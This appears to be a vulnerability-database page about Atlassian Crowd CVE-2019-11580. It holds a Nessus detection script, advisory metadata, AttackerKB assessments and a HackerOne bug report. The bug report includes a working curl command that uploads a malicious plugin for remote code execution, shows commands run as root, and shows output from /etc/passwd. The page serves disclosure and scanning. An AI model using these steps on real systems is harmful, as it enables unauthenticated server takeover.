ID CROWD_CVE-2019-11580.NASL Type nessus Reporter This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof. Modified 2020-07-16T00:00:00
Description
The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.
An unauthenticated, remote attacker can exploit this, by using the pdkinstall development plugin, to install arbitrary
plugins, which permits remote code execution.
#TRUSTED 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
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
# Plugin metadata branch. When Nessus loads the script with `description`
# set, only the attribute registration below runs and the script exits
# (exit(0) at the end of the block) before the active check further down
# is reached.
if (description)
{
script_id(138553);
script_version("1.10");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/10/30");
# Vulnerability identifiers (CVE, BugTraq, IAVA) this check reports against.
script_cve_id("CVE-2019-11580");
script_bugtraq_id(108637);
script_xref(name:"IAVA", value:"2020-A-0499");
# Version ranges in the title match the fixed versions listed in the
# "solution" attribute below.
script_name(english:"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)");
script_set_attribute(attribute:"synopsis", value:
"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.");
script_set_attribute(attribute:"description", value:
"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary
plugins, which permits remote code execution.");
# Vendor advisory (shortened to a nessus.org redirect in the see_also value):
# https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html
script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?f66fbb1c");
script_set_attribute(attribute:"see_also", value:"https://www.corben.io/atlassian-crowd-rce/");
script_set_attribute(attribute:"solution", value:
"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.");
# CVSSv2 and CVSSv3 base and temporal vectors. The temporal vectors record
# high exploit maturity (E:H) with an official vendor fix available
# (RL:OF / RL:O); the base scores are sourced from the CVE record.
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2019-11580");
# Exploit-status flags. "exploited_by_nessus" is consistent with the
# ACT_ATTACK category below: this plugin probes the target directly rather
# than inferring exposure from a version banner.
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
# Disclosure and patch dates coincide (vendor advisory of 2019-05-22);
# this direct check was published over a year later.
script_set_attribute(attribute:"vuln_publication_date", value:"2019/05/22");
script_set_attribute(attribute:"patch_publication_date", value:"2019/05/22");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/16");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:atlassian:crowd");
script_set_attribute(attribute:"stig_severity", value:"I");
script_end_attributes();
# ACT_ATTACK: the check sends a crafted request to the target (see the POST
# at the bottom of the file), so it runs in the "attack" phase of a scan.
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.");
# The check depends on crowd_detect.nasl having populated the "www/crowd"
# KB key; it runs against registered www services and falls back to 8095,
# the same default passed to get_http_port() below.
script_dependencies("crowd_detect.nasl");
script_require_keys("www/crowd");
script_require_ports("Services/www", 8095);
exit(0);
}
include('http.inc');
include('install_func.inc');
# Display name used in audit messages, and the KB key crowd_detect.nasl
# registers the install under.
app_label = 'Atlassian Crowd';
app_key   = 'crowd';

# Stop immediately when the detection plugin found no Crowd install.
get_install_count(app_name:app_key, exit_if_zero:TRUE);

port      = get_http_port(default:8095);
install   = get_single_install(app_name:app_key, webapp:TRUE, port:port);
base_path = install['path'];

# Probe the plugin-upload action with a bare POST. No body and no file part
# are sent, so nothing is installed on the target; the check only looks at
# how the server answers. exit_on_fail makes http_send_recv3() abort the
# plugin on transport errors, so res[] is populated below.
upload_action = '/admin/uploadplugin.action';
res = http_send_recv3(
  method       : 'POST',
  port         : port,
  item         : base_path + upload_action,
  exit_on_fail : TRUE
);

status_line = res[0];
body        = res[2];

# Vulnerable builds answer the empty upload with HTTP 400 and one of two
# plugin-installer error strings. NOTE(review): presumably this is the
# pdkinstall plugin's own handler rejecting the request; a patched build
# (plugin removed) is assumed to respond without these strings.
affected = FALSE;
if ('400' >< status_line)
{
  if ('Unable to install plugin' >< body) affected = TRUE;
  else if ('All plugins could not be validated' >< body) affected = TRUE;
}

# audit() does not return: it records the not-affected result and exits.
if (!affected)
  audit(AUDIT_WEB_APP_NOT_AFFECTED, app_label, build_url(qs:install['path'], port:port));

# Report the hole together with the exact request sent, so the evidence in
# the scan result can be matched against web-server logs.
security_report_v4(
  port     : port,
  severity : SECURITY_HOLE,
  generic  : TRUE,
  request  : make_list(http_last_sent_request()),
  output   : status_line + body
);
{"id": "CROWD_CVE-2019-11580.NASL", "bulletinFamily": "scanner", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)", "description": "The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary\nplugins, which permits remote code execution.", "published": "2020-07-16T00:00:00", "modified": "2020-07-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "https://www.tenable.com/plugins/nessus/138553", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://www.corben.io/atlassian-crowd-rce/", "http://www.nessus.org/u?f66fbb1c"], "cvelist": ["CVE-2019-11580"], "type": "nessus", "lastseen": "2020-10-31T05:28:00", "edition": 5, "viewCount": 10, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3"]}, {"type": "cve", "idList": ["CVE-2019-11580"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CWD-5388"]}, {"type": "hackerone", "idList": ["H1:632721"]}, {"type": "nessus", "idList": ["CROWD_3_4_4.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0"]}, {"type": "threatpost", "idList": ["THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452"]}], "modified": "2020-10-31T05:28:00", "rev": 2}, "score": {"value": 7.6, "vector": "NONE", "modified": "2020-10-31T05:28:00", "rev": 2}, "vulnersScore": 7.6}, "sourceData": "#TRUSTED 
3e971037c310d5fb21b4bf63b98f20695b4e16697afd43aba7ac879da113e477c9033c2bd683a3ac32481ec91c55bd50145622a02e8f52ae850ab5e7b0349332f01e58d8165702556230d47fdec6d8498e1b9725e90e63b6d83a0e04446f153c63f9cfc432dbd424b759f7b0e44cb3827872ab24b9f5dab18eabef570720e15a5c4f0046f65a587efd4179ed86d434667339ffeb4afd49420a753b299d0543b56bb62bbd335e090f811b7b2b2371e49a0865d5ef16c08446d6a28f1737064ad0c952b36e633ffa769c081b2af7b1489f5d8d4f8f769c8f287f920dc7c85f43939ca9c5b66e65e5a2cce534c993f500ed3f53aeb3535fdb8cbd8e3059ea04157b60159ee9ff99d7205ad2b0364d26b6746671a7c7ce1ceee5dc836d25a7ab829048c0e1231a0afe30d5b38b761dc57312a97927695c40f78df2ba521e6412b1cbd22178c73240e4ce700c833d4303a6bbf5a1a2c04bc8d4a87e6681bd5e5097f7344091675a23e54a8b526f6b49e4733d4ddd682578490380506a6783326b009bbc2cd7091647a026e9ed6d9c73842966deedfd756fe562f244e5e0184e5d376b1c75e20258f56749dd52f120c42ce741862213fc7d439e70332fedad9cc41c8cce70e3942a738a66fdd0bd5b4e5fa92fd8696c39ffaa63db5f2e05c3633c39d5495e8b7e72bdde6030da9f109f59eaed6c334735eb75c893daf316f874fc7eb7\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138553);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/10/30\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_bugtraq_id(108637);\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install 
arbitrary\nplugins, which permits remote code execution.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.corben.io/atlassian-crowd-rce/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\nappname = 'Atlassian Crowd';\napp_id = 'crowd';\n\n# Exit if app is not detected on the target\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:8095);\ninstall = get_single_install(app_name:app_id, webapp:TRUE, port:port);\n\nbase_path = install['path'];\nurl = '/admin/uploadplugin.action';\n\nres = http_send_recv3(\n method : 'POST',\n port : port,\n item : base_path + url,\n exit_on_fail : TRUE\n);\n\nif ('400' >< res[0] && ('Unable to install plugin' >< res[2] || 'All plugins could not be validated' >< res[2]))\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : res[0] + res[2]\n );\n}\nelse\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:install['path'], port:port));\n}\n\n\n", "naslFamily": "CGI abuses", "pluginID": "138553", "cpe": ["cpe:/a:atlassian:crowd"], "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "scheme": null}
{"attackerkb": [{"lastseen": "2020-11-18T06:36:29", "bulletinFamily": "info", "cvelist": ["CVE-2019-11580"], "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\nThis is now supposedly being exploited in the wild by Chinese state actors according to this NSA announcement: <https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>\n", "modified": "2020-07-24T00:00:00", "published": "2019-06-03T00:00:00", "id": "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "href": "https://attackerkb.com/topics/ibknVO2p8H/cve-2019-11580", "type": "attackerkb", "title": "CVE-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-18T06:36:31", "bulletinFamily": "info", "cvelist": ["CVE-2019-11580"], "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. 
Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n \n**Recent assessments:** \n \n**wvu-r7** at July 15, 2019 5:39pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n 
src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 5**busterb** at August 13, 2019 6:10pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the `Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. 
Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5**gwillcox-r7** at October 20, 2020 6:56pm UTC reported:\n\n#### Assessment\n\nI think I would see this in the real world, exploitation is trivial, and attacking an SSO system could be valuable.\n\n#### Additional analysis\n\n> What would happen if I changed the 
`Content-Type` from `multipart/form-data` to a different `multipart` encoding? Let\u2019s try it.\n> \n> This time I decided to try uploading my malicious plugin with the Content-Type of `multipart/mixed` instead. Maybe that would work?\n\nThey didn\u2019t share how they got there, but it\u2019s an easy find with source code.\n \n \n wvu@kharak:~$ cd Downloads/\n wvu@kharak:~/Downloads$ git clone https://bitbucket.org/atlassian/pdkinstall-plugin.git\n Cloning into 'pdkinstall-plugin'...\n remote: Counting objects: 210, done.\n remote: Compressing objects: 100% (115/115), done.\n remote: Total 210 (delta 88), reused 138 (delta 56)\n Receiving objects: 100% (210/210), 26.20 KiB | 813.00 KiB/s, done.\n Resolving deltas: 100% (88/88), done.\n wvu@kharak:~/Downloads$ cd pdkinstall-plugin/\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep isMultipart\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: if (isMultipart)\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$ git grep ServletFileUpload\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java:import org.apache.commons.fileupload.servlet.ServletFileUpload;\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: boolean isMultipart = ServletFileUpload.isMultipartContent(req);\n src/main/java/com/atlassian/pdkinstall/PdkInstallFilter.java: ServletFileUpload upload = new ServletFileUpload(factory);\n wvu@kharak:~/Downloads/pdkinstall-plugin:master$\n \n\n<https://commons.apache.org/proper/commons-fileupload/apidocs/org/apache/commons/fileupload/servlet/ServletFileUpload.html>\n\n> This class handles multiple files per single HTML widget, sent using `multipart/mixed` encoding type, as specified by [RFC 1867](<http://www.ietf.org/rfc/rfc1867.txt>).\n", "modified": "2020-02-13T00:00:00", "published": "2020-02-13T00:00:00", "id": 
"AKB:B983621D-529B-4375-AA6C-0DB0FBBF9A94", "href": "https://attackerkb.com/topics/BriLAQlFp1/atlassian-crowd-pdkinstall-development-plugin-incorrectly-enabled-cve-2019-11580", "type": "attackerkb", "title": "Atlassian Crowd: pdkinstall development plugin incorrectly enabled (CVE-2019-11580)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2020-12-09T21:41:40", "description": "Atlassian Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-06-03T14:29:00", "title": "CVE-2019-11580", "type": "cve", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-11580", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-11580", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "atlassian": [{"lastseen": "2020-12-24T14:35:32", "bulletinFamily": "software", "cvelist": ["CVE-2019-11580"], "description": "Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\r\n\r\n*Affected versions:*\r\n * All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.\r\n\r\nh4. *Fix:*\r\n * Crowd and Crowd Data Center version 3.4.4 is available for download from [https://www.atlassian.com/software/crowd/download]\r\n * Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 are available for download from [https://www.atlassian.com/software/crowd/download-archive]\r\n\r\n\u00a0\r\n*Mitigation*\r\n\r\nAtlassian recommends that you upgrade to the latest version. 
However, this issue can be mitigated as per the following instructions:\r\n # Stop Crowd\r\n # Find and delete any\u00a0pdkinstall-plugin jar files from the Crowd *installation directory and the data directory*\r\n # Remove the\u00a0pdkinstall-plugin jar file from <Crowd installation directory>/crowd-webapp/WEB-INF/classes/atlassian-bundled-plugins.zip\r\n # Start Crowd\r\n # Check that there are no\u00a0pdkinstall-plugin jar files in the *installation directory or the data directory.*\u00a0\r\n\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/x/3ADVOQ].", "edition": 11, "modified": "2020-02-17T05:14:59", "published": "2019-05-06T04:06:13", "id": "ATLASSIAN:CWD-5388", "href": "https://jira.atlassian.com/browse/CWD-5388", "title": "Crowd - pdkinstall development plugin incorrectly enabled - CVE-2019-11580", "type": "atlassian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hackerone": [{"lastseen": "2019-10-04T15:31:46", "bulletinFamily": "bugbounty", "bounty": 0.0, "cvelist": ["CVE-2019-11580"], "description": "**Summary:**\nAtlassian Crowd is a centralized identity management application that allows companies to \"Manage users from multiple directories - Active Directory, LDAP, OpenLDAP or Microsoft Azure AD - and control application authentication permissions in one single location.\"\n\nA DOD installation is vulnerable to a remote code execution vulnerability due to not patching CVE-2019-11580.\n\n**Description:**\nFrom Atlassian's public [advisory](https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html):\n\n> Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. 
Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center.\n\nThere is no public proof-of-concept for this vulnerability, however, I spent a good amount of time reverse-engineering the \"pdkinstall\" plugin and I was able to successfully construct a working exploit.\n\n## Step-by-step Reproduction Instructions\n\n1. Download and unzip my malicious plugin: rce-plugin.zip {F519371}\n2. `cd` into the directory\n3. Run the following command:\n```\ncurl -k -H \"Content-Type: multipart/content\" \\\n --form \"file_cdl=@rce.jar;type=application/octet-stream\" https://\u2588\u2588\u2588/crowd/admin/uploadplugin.action\n```\n\nYou'll see that the malicious plugin is successfully installed:\n\n```\nInstalled plugin /opt/atlassian/crowd/apache-tomcat/temp/plugindev-2906099909159442588rce.jar\n```\n\nNow visit https://\u2588\u2588\u2588\u2588\u2588\u2588\u2588/crowd/plugins/servlet/hackerone-cdl which invokes my malicious plugin. 
This executes the command `whoami` which is the user `root`\n\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\n\ncontents of `/etc/passwd`\n\n```\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:6:0:\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin:/sbin/shutdown\n\u2588\u2588\u2588\u2588\u2588\u2588x:7:0:\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin:/sbin/halt\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:8:12:\u2588\u2588\u2588\u2588\u2588/var/spool/\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588x:10:14:\u2588\u2588\u2588/var/spool/\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588x:11:0:\u2588\u2588\u2588\u2588\u2588\u2588/root:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:12:100:\u2588\u2588\u2588\u2588\u2588\u2588\u2588/usr/\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:13:30:\u2588\u2588\u2588\u2588\u2588/var/\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588x:14:50:FTP User:/var/\u2588\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:99:99:Nobody:/:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:38:38::/etc/\u2588\u2588\u2588\u2588\u2588\u2588/sbin/nologin\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588x:499:76:\"Saslauthd 
